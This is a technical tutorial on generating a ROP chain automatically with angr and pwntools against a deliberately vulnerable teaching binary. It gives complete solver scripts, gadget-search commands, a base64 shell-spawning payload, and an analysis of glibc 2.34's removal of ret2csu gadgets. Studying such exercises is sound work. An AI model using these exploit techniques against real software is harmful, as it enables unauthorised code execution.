Title:   Angr Symbolic Execution Exercise--Automatic Rop Chain Generation
Created: 2025-04-10 11:44
Updated: 2025-04-23 12:11
Link:    https://scz.617.cn/unix/202504101144.txt

--------------------------------------------------------------------------

Contents:

    ☆ Target ELF
    ☆ buffer_overflow_64bit_solver.py
    ☆ ROP tools
    ☆ buffer_overflow_64bit_solver_a.py
    ☆ Why buffer_overflow_64bit_bad cannot be used for the demo

--------------------------------------------------------------------------

☆ Target ELF

See
--------------------------------------------------------------------------
Automatic Rop Chain Generation - [2022-01-16]
https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/automatic-exploit-generation/automatic-rop-chain-generation

https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation
https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation/blob/master/buffer_overflow.c
https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation/blob/master/buffer_overflow_64bit
https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation/blob/master/auto_rop_chain.py
--------------------------------------------------------------------------

The author of this challenge already provides a solver. This article only
studies the techniques involved and contains nothing original.

buffer_overflow.c is the target source; buffer_overflow_64bit is the
precompiled target ELF.

--------------------------------------------------------------------------
int pwn_me()
{
    char my_buf[20] = {'\x00'};
    printf("Your buffer is at %p\n", my_buf);
    /*
     * Stack overflow
     */
    gets(my_buf);
    return 0;
}

void does_nothing()
{
    puts("/bin/sh");
    execve(NULL,NULL,NULL);
    system("sleep 1");
}

void main()
{
    puts("pwn_me:");
    pwn_me();
}
--------------------------------------------------------------------------

$ file -b buffer_overflow_64bit
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), ..., not stripped

$ rabin2 -I buffer_overflow_64bit
canary   false      // no "stack canary"
injprot  false      // from this, the author infers there is no ASLR
linenum  true       // contains line number information
lsyms    true       // contains debug symbols
nx       true       // NX protection enabled, stack is not executable
relocs   true       // contains relocation information
relro    partial    // Relocation Read-Only is partially enabled
sanitize false      // not built with AddressSanitizer or similar
static   false      // dynamically linked
stripped false      // not stripped
(output abridged)

The goal of this exercise is to use angr plus pwn (pwntools) to generate a
ROP-based exploit automatically.

gets() triggers the stack overflow. The stack is not executable, so ROP is
required.

does_nothing() is deliberately provided for the solver. It thoughtfully
supplies everything ROP needs: the key functions and the key string. If you
build the target ELF from source, do not enable optimization, otherwise the
unused code may be discarded. Even so, building the ELF from source is not
recommended, for reasons given later.

☆ buffer_overflow_64bit_solver.py

--------------------------------------------------------------------------
import sys, os, time, base64, logging
import angr, claripy
import pwn

def generate_standard_rop_chain ( binary ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )
    logging.getLogger( 'pwnlib.rop.rop' ).setLevel( logging.ERROR )

    pwn.context.clear()
    pwn.context.arch = 'amd64'
    pwn.context.os = 'linux'
    pwn.context.binary = binary

    elf = pwn.ELF( binary )
    rop = pwn.ROP( elf )

    strings = [ b"/bin/sh\0", b"/bin/bash\0" ]
    functions = [ "system", "execve" ]

    ret_func = None
    ret_string = None

    for function in functions :
        if function in elf.plt :
            ret_func = elf.plt[function]
            break
        elif function in elf.symbols :
            ret_func = elf.symbols[function]
            break

    if not ret_func :
        raise RuntimeError( "Cannot find symbol to return to" )

    for string in strings :
        #
        # elf.search() returns an iterator
        #
        str_occurences = list( elf.search( string ) )
        if str_occurences :
            ret_string = str_occurences[0]
            break

    if not ret_string :
        raise RuntimeError( "Cannot find string to pass to system or exec" )

    #
    # On 64-bit Linux (amd64), the system function (often implemented in
    # libc) might use movaps instructions which require the stack pointer
    # (rsp) to be 16-byte aligned. Sometimes, the state of the stack just
    # before calling system via ROP leaves it misaligned (e.g., aligned to
    # 8 bytes but not 16). Adding a single ret gadget advances the stack
    # pointer by one word (8 bytes on amd64), potentially fixing this
    # alignment issue.
    #
    # Whether to add this ret should be decided by testing; it is not a
    # universal fix
    #
    rop.raw( rop.ret.address )
    #
    # Usually produces a sequence on the stack like
    # [pop_rdi_ret][ret_string][ret_func]
    #
    rop.call( ret_func, [ret_string] )

    #
    # 0x0000:         0x40101a ret
    # 0x0008:         0x4012d3 pop rdi; ret
    # 0x0010:         0x40201a [arg0] rdi = 4202522 // 4202522=0x40201a
    # 0x0018:         0x401094
    #
    try :
        print( rop.dump() )
    except Exception as e :
        print( f"Couldn't automatically find a way: {e}", file=sys.stderr )
        sys.exit( -1 )

    return rop, rop.build()

#
# This function is not a general implementation; it only handles the
# "pop|ret" case
#
def do_64bit_rop_with_stepping ( elf, rop, rop_chain, state ) :
    #
    # rop_chain is a list of code addresses, data addresses or integers
    #
    # rop.gadgets holds all gadgets; it is a dict keyed by code address
    #
    # print( rop_chain )
    # print( rop.gadgets )

    curr_rop = None
    elf_symbol_addrs = [y for x, y in elf.symbols.items()]

    for i, gadget in enumerate( rop_chain ) :
        #
        # We generally have two constraining mode
        #
        # 1. running a code gadget
        # 2. setting a register to an expected popped value
        #

        #
        # gadget may be a data address or an integer rather than a code
        # address
        #
        if gadget in rop.gadgets :
            curr_rop = rop.gadgets[gadget]
            #
            # reversing it lets us pop values out easy
            #
            # list.pop() removes from the tail and pop(0) from the head,
            # but pop(0) performs poorly, especially on large lists, so it
            # is not recommended; hence the reverse() here
            #
            curr_rop.regs.reverse()

        #
        # Case 1: running a code gadget
        #
        # We keep track of the number of registers our gadget popped, and
        # if it's 0, then we're just executing
        #
        if curr_rop is None or gadget in rop.gadgets or len( curr_rop.regs ) == 0 :
            desire = state.regs.pc == gadget
            if state.satisfiable( extra_constraints=( desire, ) ) :
                #
                # This process is slower than just setting the whole stack
                # to the chain, but in testing it seems to work more
                # reliably
                #
                print( "Setting PC to {}".format( hex( gadget ) ) )
                state.add_constraints( desire )
                #
                # Since we're emulating the program's execution with angr
                # we will run into an issue when executing any symbols.
                # Where a SimProcedure will get executed instead of the
                # real function, which then gives us the wrong constraints
                # /execution for our rop_chain
                #
                if gadget in elf_symbol_addrs :
                    #
                    # item is [symbol,addr]
                    #
                    item = [x for x in elf.symbols.items() if gadget == x[1]][0]
                    print( f"Gadget '{item[0]}' is hooked symbol, contraining to real address, but calling SimProc" )
                    state.regs.pc = state.project.loader.find_symbol( item[0] ).rebased_addr
                    #
                    # state.regs.pc.concrete_value
                    # state.regs.pc.args[0]
                    #
                    pc = state.regs.pc.concrete_value
                    #
                    # auto_load_libs=False
                    #
                    # Gadget 'system' => 0x500010
                    #

                    #
                    # auto_load_libs=True
                    #
                    # Gadget 'system' => 0x550d70
                    #

                    #
                    # $ objdump -p /lib/x86_64-linux-gnu/libc.so.6 | grep -m 1 LOAD | awk -F' ' '{print $5;}'
                    # $ readelf -l /lib/x86_64-linux-gnu/libc.so.6 | grep -m 1 LOAD | awk -F' ' '{print $3;}'
                    # 0x0000000000000000
                    #
                    # $ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " system@"
                    # 0000000000050d70 W system@@GLIBC_2.2.5
                    #
                    print( f"Gadget '{item[0]}' => {pc:#x}" )
                    print( state.project.loader.find_object_containing( pc ) )

                if i == len( rop_chain ) - 1 :
                    break

                sm = state.project.factory.simulation_manager( state )
                #
                # opt_level=0 is the key. It tells angr's VEX engine to
                # disable or reduce optimization. By default angr tries to
                # analyze and lift the VEX IR of a whole basic block at
                # once. For ROP gadgets, which are usually very short and
                # end in ret, the default optimization may make the
                # simulated behavior differ from real CPU execution, or
                # simulate too many instructions in one go. opt_level=0
                # forces angr closer to single-stepping and models the
                # effect of a ROP gadget more precisely.
                #
                sm.explore( opt_level=0 )
                if sm.unconstrained :
                    state = sm.unconstrained[0]
                else :
                    print( "sm.unconstrained[] is empty", file=sys.stderr )
                    sys.exit( -1 )
            else :
                print( "Unsatisfied setting PC to {}".format( hex( gadget ) ), file=sys.stderr )
                sys.exit( -1 )
        #
        # Case 2: setting a register to an expected popped value
        #
        else :
            #
            # pop() removes from the tail; because of the earlier
            # reverse(), this pop() yields the first register in code
            # order
            #
            next_reg = curr_rop.regs.pop()
            if type( next_reg ) is not str :
                print( "type( next_reg ) is not str", file=sys.stderr )
                sys.exit( -1 )
            print( "Setting register {}".format( next_reg ) )
            gadget_msg = gadget
            if isinstance( gadget, int ) :
                gadget_msg = hex( gadget )
            state_reg = getattr( state.regs, next_reg )
            desire = state_reg == gadget
            if state_reg.symbolic and state.satisfiable( extra_constraints=( desire, ) ) :
                print( "Setting register {} to {}".format( next_reg, gadget_msg ) )
                state.add_constraints( desire )
            else :
                print( "Unsatisfied on setting {} to {}".format( next_reg, gadget_msg ), file=sys.stderr )
                sys.exit( -1 )
            if len( curr_rop.regs ) == 0 :
                curr_rop = None

    return state

def get_input ( state ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )

    copy_state = state.copy()
    binary = state.project.filename
    elf = pwn.ELF( binary )
    rop, rop_chain = generate_standard_rop_chain( binary )
    new_state = do_64bit_rop_with_stepping( elf, rop, rop_chain, copy_state )
    input = new_state.posix.dumps( sys.stdin.fileno() )
    return input

def check_mem_corruption ( sm ) :
    if len( sm.unconstrained ) :
        for u in sm.unconstrained :
            desire = u.regs.pc == 0x41414141
            if u.satisfiable( extra_constraints=( desire, ) ) :
                sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) )
                # print( sth )
                print( "RetAddr offset is {}".format( sth.index( b"AAAA" ) ) )
                u.globals["input"] = get_input( u )
                sm.stashes['found'].append( u )
                sm.stashes['unconstrained'].remove( u )
                sm.drop( stash='active' )
                break
    return sm

def main ( argv ) :

    logging.getLogger( 'angr.engines.successors' ).setLevel( logging.ERROR )
    logging.getLogger( 'angr.procedures.libc.gets' ).setLevel( logging.ERROR )

    #
    # In this example auto_load_libs should be True. True is the default
    # and means dependent libraries are loaded. With False,
    # state.project.loader.find_symbol( item[0] ).rebased_addr resolves to
    # the SimProcedure trampoline address, which lives in cle rather than
    # in libc.so.6; in other words, the automatic hook is not bypassed.
    # The original intent is to bypass SimProcedure and use the address in
    # libc when checking the rop chain, so False should not be used here.
    #
    # For this example alone, False still gives the expected result. Only
    # the last hop of the rop chain, system, has its rebased_addr wrongly
    # resolved to the SimProcedure trampoline address; the other hops do
    # not involve SimProcedure, and the last hop is never handed to angr
    # for simulation, so the bug happens not to be triggered.
    #
    proj = angr.Project( argv[1], auto_load_libs=True )
    magic_size = 128
    magic = claripy.BVS( "magic", magic_size * 8 )
    init_state = \
        proj.factory.full_init_state(
            stdin = angr.SimFileStream(
                name = 'stdin',
                content = magic,
                has_end = True
            ),
        )
    #
    # Sets the limit on the number of symbolic bytes in the stdin/stdout
    # buffers of the libc that angr simulates. For performance reasons
    # angr may not keep an entire stream symbolic. This option tells angr
    # how many leading bytes of stdin/stdout/stderr to treat as symbolic
    # at most. If the program reads more than that, angr may concretize
    # the rest or use some other strategy. A large enough value helps
    # ensure the symbolic input magic can reach the buffer that must be
    # overflowed.
    #
    # This example is a special case: testing shows it works without the
    # setting, but setting it is still recommended
    #
    # The default is 60
    #
    init_state.libc.buf_symbolic_bytes = magic_size
    sm = proj.factory.simulation_manager(
        init_state,
        save_unconstrained = True,
        stashes = {
            'active' : [init_state],
            'unconstrained' : [],
            'found' : [],
        }
    )
    sm.explore( step_func=check_mem_corruption )
    if not sm.found :
        return
    raw = sm.found[0].globals["input"]
    somefile = '/tmp/some.bin'
    with open( somefile, "wb" ) as f :
        f.write( raw )
    print( "cat {} - | ./{}".format( somefile, argv[1] ) )
    solution = base64.b64encode( raw ).decode( 'utf-8' )
    print( '(echo -ne "%s" | base64 -d;cat -) | ./%s' % ( solution, argv[1] ) )

if "__main__" == __name__ :
    start = time.time()
    main( sys.argv )
    end = time.time()
    print( "Time elapsed: {}".format( end - start ) )
--------------------------------------------------------------------------

In the example above auto_load_libs should be True. It was previously set
to False by mistake, although for other reasons no bug was triggered. This
was corrected after bluerust pointed it out; see the corresponding comment
for details.

The overall approach is as follows. check_mem_corruption() finds a state in
which RetAddr is controllable. get_input() obtains the input used for the
stack overflow. generate_standard_rop_chain() obtains the rop chain; this
step has nothing to do with angr and depends only on the pwn module. In a
sense "Auto ROP Generation" is a gimmick that leads people to believe angr
found the rop chain. do_64bit_rop_with_stepping() does the constraint
solving that ensures the rop chain actually gets executed.

rop.gadgets[addr].regs[] is a list whose elements may be names of the
registers this gadget modifies, or may be integers. Look at rop.gadgets:

{
    4198423: Gadget(0x401017, ['add esp, 8', 'ret'], [8], 0x10),
    4198422: Gadget(0x401016, ['add rsp, 8', 'ret'], [8], 0x10),
    4198919: Gadget(0x401207, ['leave', 'ret'], ['rbp', 'rsp'], 0x2540be407),
    4199116: Gadget(0x4012cc, ['pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['r12', 'r13', 'r14', 'r15'], 0x28),
    4199118: Gadget(0x4012ce, ['pop r13', 'pop r14', 'pop r15', 'ret'], ['r13', 'r14', 'r15'], 0x20),
    4199120: Gadget(0x4012d0,
        ['pop r14', 'pop r15', 'ret'], ['r14', 'r15'], 0x18),
    4199122: Gadget(0x4012d2, ['pop r15', 'ret'], ['r15'], 0x10),
    4199115: Gadget(0x4012cb, ['pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r12', 'r13', 'r14', 'r15'], 0x30),
    4199119: Gadget(0x4012cf, ['pop rbp', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r14', 'r15'], 0x20),
    4198813: Gadget(0x40119d, ['pop rbp', 'ret'], ['rbp'], 0x10),
    4199123: Gadget(0x4012d3, ['pop rdi', 'ret'], ['rdi'], 0x10),
    4199121: Gadget(0x4012d1, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0x18),
    4199117: Gadget(0x4012cd, ['pop rsp', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rsp', 'r13', 'r14', 'r15'], 0x28),
    4198426: Gadget(0x40101a, ['ret'], [], 0x8)
}

The third column of Gadget() (counting from 1) is regs[]. Most of the time
it is a list of register names, sometimes it looks like [8], and sometimes
it is []. The meaning of regs[] is easy to tell in each case, and code that
processes regs[] must allow for all of these possibilities.

$ python3 buffer_overflow_64bit_solver.py buffer_overflow_64bit

If all goes well, the output looks something like

RetAddr offset is 40
0x0000:         0x40101a ret
0x0008:         0x4012d3 pop rdi; ret
0x0010:         0x40201a [arg0] rdi = 4202522
0x0018:         0x401094
Setting PC to 0x40101a
Setting PC to 0x4012d3
Setting register rdi
Setting register rdi to 0x40201a
Setting PC to 0x401094
Gadget 'system' is hooked symbol, contraining to real address, but calling SimProc
Gadget 'system' => 0x550d70
cat /tmp/some.bin - | ./buffer_overflow_64bit
(echo -ne "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABoQQAAAAAAA0xJAAAAAAAAaIEAAAAAAAJQQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" | base64 -d;cat -) | ./buffer_overflow_64bit

☆ ROP tools

See
--------------------------------------------------------------------------
https://docs.pwntools.com/en/stable/rop/rop.html

ROPgadget Tool
https://github.com/JonathanSalwan/ROPgadget

Ropper
https://github.com/sashs/Ropper
--------------------------------------------------------------------------

pip3 install ROPgadget ropper
pip3 show ROPgadget ropper

ROPgadget.py is as follows

--------------------------------------------------------------------------
import ropgadget
ropgadget.main()
--------------------------------------------------------------------------

python3 ROPgadget.py --help
python3 ROPgadget.py --binary buffer_overflow_64bit --only "pop|ret"
python3 ROPgadget.py --binary buffer_overflow_64bit --ropchain

Ropper.py is as follows

--------------------------------------------------------------------------
import sys
sys.path.append("filebytes")
import ropper
ropper.start(sys.argv[1:])
--------------------------------------------------------------------------

python3 Ropper.py -h
python3 Ropper.py -f buffer_overflow_64bit --search "pop rdi"
python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret"
python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret" --detail

With --detail, each line shows one instruction; without it, all instructions
of a gadget are shown on a single line separated by semicolons.

python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]"
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax"
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3
python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3 --detail

A quality of 1 is the best but may yield no result; 10 is the worst and may
yield many results.

☆ buffer_overflow_64bit_solver_a.py

The rop chain can be placed on the stack directly, which is simpler. The
original comment says that having angr simulate the rop chain is more
reliable, which is why the complicated do_64bit_rop_with_stepping() is used;
for this example alone that is unnecessary. The example below modifies two
functions and removes do_64bit_rop_with_stepping().

--------------------------------------------------------------------------
def get_input ( state, prefix ) :

    logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR )

    binary = state.project.filename
    elf = pwn.ELF( binary )
    rop, rop_chain = generate_standard_rop_chain( binary )
    input = prefix
    #
    # Place the rop chain directly on the stack
    #
    for item in rop_chain :
        if not isinstance( item, int ) :
            raise TypeError( f"ROP chain item is not an integer: {item} ({type(item)})" )
        #
        # Pack the 64-bit integer into 8 bytes, little-endian
        #
        item = item.to_bytes( 8, byteorder='little', signed=False )
        input += item
    return input

def check_mem_corruption ( sm ) :
    if len( sm.unconstrained ) :
        for u in \
                sm.unconstrained :
            desire = u.regs.pc == 0x41414141
            if u.satisfiable( extra_constraints=( desire, ) ) :
                sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) )
                off = sth.index( b"AAAA" )
                print( "RetAddr offset is {}".format( off ) )
                sth = sth[0:off]
                u.globals["input"] = get_input( u, sth )
                sm.stashes['found'].append( u )
                sm.stashes['unconstrained'].remove( u )
                sm.drop( stash='active' )
                break
    return sm
--------------------------------------------------------------------------

☆ Why buffer_overflow_64bit_bad cannot be used for the demo

Build buffer_overflow_64bit_bad from source

gcc-11 -fno-stack-protector \
-Wno-implicit-function-declaration -Wno-format-security \
-no-pie -z relro buffer_overflow.c -o buffer_overflow_64bit_bad

There is one warning

/usr/bin/ld: /tmp/cca0Wjc7.o: in function `pwn_me':
buffer_overflow.c:(.text+0x4b): warning: the `gets' function is dangerous and should not be used.

This warning comes from ld and cannot be silenced with gcc options. It says
that gets() is a dangerous function.

Building a rop chain for buffer_overflow_64bit requires a "pop rdi; ret"
gadget. One does exist, at 0x4012d3, inside __libc_csu_init(). The
instruction there is really "pop r15" (41 5F), but when execution starts one
byte into it, the remaining byte 5F decodes as "pop rdi".

--------------------------------------------------------------------------
gdb -q -nx --args ./buffer_overflow_64bit anything

starti

(gdb) x/2i 0x4012d3
   0x4012d3 <__libc_csu_init+99>:       pop    %rdi
   0x4012d4 <__libc_csu_init+100>:      ret
(gdb) x/2bx 0x4012d3
0x4012d3 <__libc_csu_init+99>:  0x5f    0xc3
--------------------------------------------------------------------------
/*
 * buffer_overflow_64bit
 */
00000000004010D0                        _start
...
00000000004010E3 49 C7 C0 E0 12 40 00   mov     r8, offset __libc_csu_fini ; fini
00000000004010EA 48 C7 C1 70 12 40 00   mov     rcx, offset __libc_csu_init ; init
00000000004010F1 48 C7 C7 45 12 40 00   mov     rdi, offset main ; main
00000000004010F8 FF 15 F2 2E 00 00      call    cs:__libc_start_main_ptr
00000000004010FE F4                     hlt
--------------------------------------------------------------------------
0000000000401270                        __libc_csu_init
...
/*
 * rop chain
 */
00000000004012D2 41 5F                  pop     r15
00000000004012D4 C3                     retn
--------------------------------------------------------------------------

However, buffer_overflow_64bit_bad, built with gcc 11.3.0, contains no
"pop rdi; ret". The reason is that in the bad version fini and init are
initialized to NULL, and the ELF contains no code for __libc_csu_init().
Only __libc_csu_init() had a "pop rdi; ret", and no other rop chain serving
the same purpose was found; several ROP tools all failed to find an
alternative.

--------------------------------------------------------------------------
/*
 * buffer_overflow_64bit_bad
 */
00000000004010D0                        _start
...
/*
 * Initialized to NULL
 */
00000000004010E3 45 31 C0               xor     r8d, r8d ; fini
00000000004010E6 31 C9                  xor     ecx, ecx ; init
00000000004010E8 48 C7 C7 4E 12 40 00   mov     rdi, offset main ; main
00000000004010EF FF 15 FB 2E 00 00      call    cs:__libc_start_main_ptr
00000000004010F5 F4                     hlt
--------------------------------------------------------------------------

$ python3 buffer_overflow_64bit_solver.py buffer_overflow_64bit_bad
RetAddr offset is 40
[ERROR] Could not satisfy setRegisters({'rdi': 4202522})
ERROR    | 2025-04-09 22:23:10,945 | pwnlib.rop.rop | Could not satisfy setRegisters({'rdi': 4202522})
Couldn't automatically find a way: Could not satisfy setRegisters({'rdi': 4202522})

For now I do not know how to adjust the gcc options so that init is
initialized to __libc_csu_init.

When 小侯 read this, the reply was that this has nothing to do with the gcc
version. It depends on the glibc version and results from a security
hardening introduced in 2.34 that specifically targets the ret2csu
technique.

The following commands show the current glibc version. The first is not
reliable; the last two are recommended.

ldd --version
/lib/x86_64-linux-gnu/libc.so.6
$(ldd /bin/ls | cut -d' ' -f3 | grep libc.so.)
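
The version check can also be scripted. The following is only a minimal
sketch, not part of the original solver: parse_version() and
csu_init_removed() are hypothetical helper names, the 2.34 threshold is taken
from this article, and platform.libc_ver() reports the libc that the Python
interpreter itself uses, which is assumed here to be the same glibc that the
target ELF is built against.

```python
import platform

def parse_version(text):
    """Turn a version string such as '2.35' into a comparable tuple (2, 35)."""
    return tuple(int(part) for part in text.split(".")[:2])

def csu_init_removed(version_text):
    """Return True for glibc 2.34 or later, where this article says
    __libc_csu_init() is no longer present in newly built ELFs."""
    return parse_version(version_text) >= (2, 34)

if __name__ == "__main__":
    # libc_ver() returns a (name, version) pair; both may be empty strings
    lib, version = platform.libc_ver()
    if lib == "glibc" and version:
        print("glibc {}: __libc_csu_init removed = {}".format(
            version, csu_init_removed(version)))
    else:
        print("could not determine the glibc version")
```

If this reports True, a freshly built buffer_overflow_64bit_bad is expected
to lack the "pop rdi; ret" gadget, as observed above.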

The test environment for this article uses glibc 2.35.

See

"Viewing changes between Fastjson versions on GitHub"
https://scz.617.cn/web/202007241343.txt

Considering only remote browsing of a GitHub project in a web browser, the
general URL patterns are:

https://github.com/{user}/{repository}/releases/tag/{until-tag}
https://github.com/{user}/{repository}/compare/{from-tag}...{until-tag}
https://github.com/{user}/{repository}/compare/{from-tag}...{until-tag}.diff
https://github.com/{user}/{repository}/compare/{from-tag}...{until-tag}.patch

For example:

https://github.com/bminor/glibc/releases/tag/glibc-2.33
https://github.com/bminor/glibc/releases/tag/glibc-2.34
https://github.com/bminor/glibc/compare/glibc-2.33...glibc-2.34
https://github.com/bminor/glibc/compare/glibc-2.33...glibc-2.34.diff
https://github.com/bminor/glibc/compare/glibc-2.33...glibc-2.34.patch

Click "Commits" and search for:

Reduce the statically linked startup code

Click "Files changed" and search for:

libc-start.c

"Commits" and "Files changed" both contain too many entries. If the item you
want is not on the first few pages, paging through them one by one takes
more patience than most people have. Instead, open

https://github.com/bminor/glibc/blob/glibc-2.34/csu/libc-start.c

click "Blame" and search for "call_init". Next to the hit, on the left, are

https://github.com/bminor/glibc/commit/035c012e32c11e84d64905efaf55e74f704d3668
https://github.com/bminor/glibc/blame/a79328c745219dcb395070cdcd3be065a8347f24/csu/libc-start.c

The first is the change made around 2.34; the second leads to earlier
changes. This section only cares about the first. Search it for
"libc-start.c" and click the hit to get

https://github.com/bminor/glibc/commit/035c012e32c11e84d64905efaf55e74f704d3668#diff-d8c51a7b495ae610b2fe2f3ef10828d09c3c99718a32d6c50eb8b4e4159ca7e9

This is the change made to libc-start.c around 2.34.

The commit was submitted on 2021-02-25 and carries the following message:

--------------------------------------------------------------------------
It turns out the startup code in csu/elf-init.c has a perfect pair of
ROP gadgets (see Marco-Gisbert and Ripoll-Ripoll, "return-to-csu: A
New Method to Bypass 64-bit Linux ASLR"). These functions are not
needed in dynamically-linked binaries because DT_INIT/DT_INIT_ARRAY
are already processed by the dynamic linker. However, the dynamic
linker skipped the main program for some reason.
For maximum backwards compatibility, this is not changed, and instead,
the main map is consulted from __libc_start_main if the init function
argument is a NULL pointer.

For statically linked binaries, the old approach based on linker
symbols is still used because there is nothing else available.

A new symbol version __libc_start_main@@GLIBC_2.34 is introduced because
new binaries running on an old libc would not run their ELF
constructors, leading to difficult-to-debug issues.
--------------------------------------------------------------------------

Before 2.34 there was "csu/elf-init.c", which contained __libc_csu_init();
that function calls init_array[].

2.34 removed elf-init.c and with it __libc_csu_init() and related functions.

In 2.34, "csu/libc-start.c" contains call_init(), which calls init_array[].

__libc_csu_init() lives inside the ELF that contains main(), whereas the
call_init() symbol that gdb resolves below lives in ld-linux-x86-64.so.2
(the dynamic linker). ASLR affects the latter far more.

--------------------------------------------------------------------------
gdb -q -nx --args ./buffer_overflow_64bit anything

starti

(gdb) x/i __libc_csu_init
   0x401270 <__libc_csu_init>:  endbr64
(gdb) | info proc mappings | grep buffer_overflow_64bit | grep 'r-xp'
            0x401000           0x402000     0x1000     0x1000  r-xp   /tmp/buffer_overflow_64bit
(gdb) info symbol 0x401270
__libc_csu_init in section .text of /tmp/buffer_overflow_64bit
--------------------------------------------------------------------------
gdb -q -nx --args ./buffer_overflow_64bit_bad anything

starti

(gdb) x/i call_init
   0x7ffff7fc93e0 :     push   %r14
(gdb) | info proc mappings | grep ld-linux | grep 'r-xp'
      0x7ffff7fc5000     0x7ffff7fef000    0x2a000     0x2000  r-xp   /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
(gdb) info symbol 0x7ffff7fc93e0
call_init.part in section .text of /lib64/ld-linux-x86-64.so.2
--------------------------------------------------------------------------

CTF players would probably recognize all this at a glance. I have never
played CTF and am not familiar with these subtle changes.
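
To make the "pop r15" versus "pop rdi" observation from this section
concrete, here is a minimal sketch that searches raw bytes for a gadget at
every byte offset, not only at instruction boundaries. The three bytes and
the base address 0x4012D2 are copied from the disassembly of
buffer_overflow_64bit shown earlier; find_gadget() is a hypothetical helper
written for illustration and is not how pwntools, ROPgadget or Ropper are
implemented.

```python
# Bytes at 0x4012D2 in buffer_overflow_64bit: 41 5F = pop r15, C3 = ret
CODE_BASE = 0x4012D2
CODE = bytes.fromhex("415fc3")

# 5F = pop rdi, C3 = ret
POP_RDI_RET = bytes.fromhex("5fc3")

def find_gadget(code, base, pattern):
    """Return the address of every occurrence of pattern in code,
    scanning byte by byte so mid-instruction matches are included."""
    hits = []
    pos = code.find(pattern)
    while pos != -1:
        hits.append(base + pos)
        pos = code.find(pattern, pos + 1)
    return hits

if __name__ == "__main__":
    for addr in find_gadget(CODE, CODE_BASE, POP_RDI_RET):
        print("pop rdi; ret candidate at {:#x}".format(addr))
```

The only hit is one byte past the start of "pop r15", which is the address
pwntools reported for its "pop rdi; ret" gadget. Running the same search
over the .text bytes of buffer_overflow_64bit_bad would be one way to
cross-check that no such byte pair is available there.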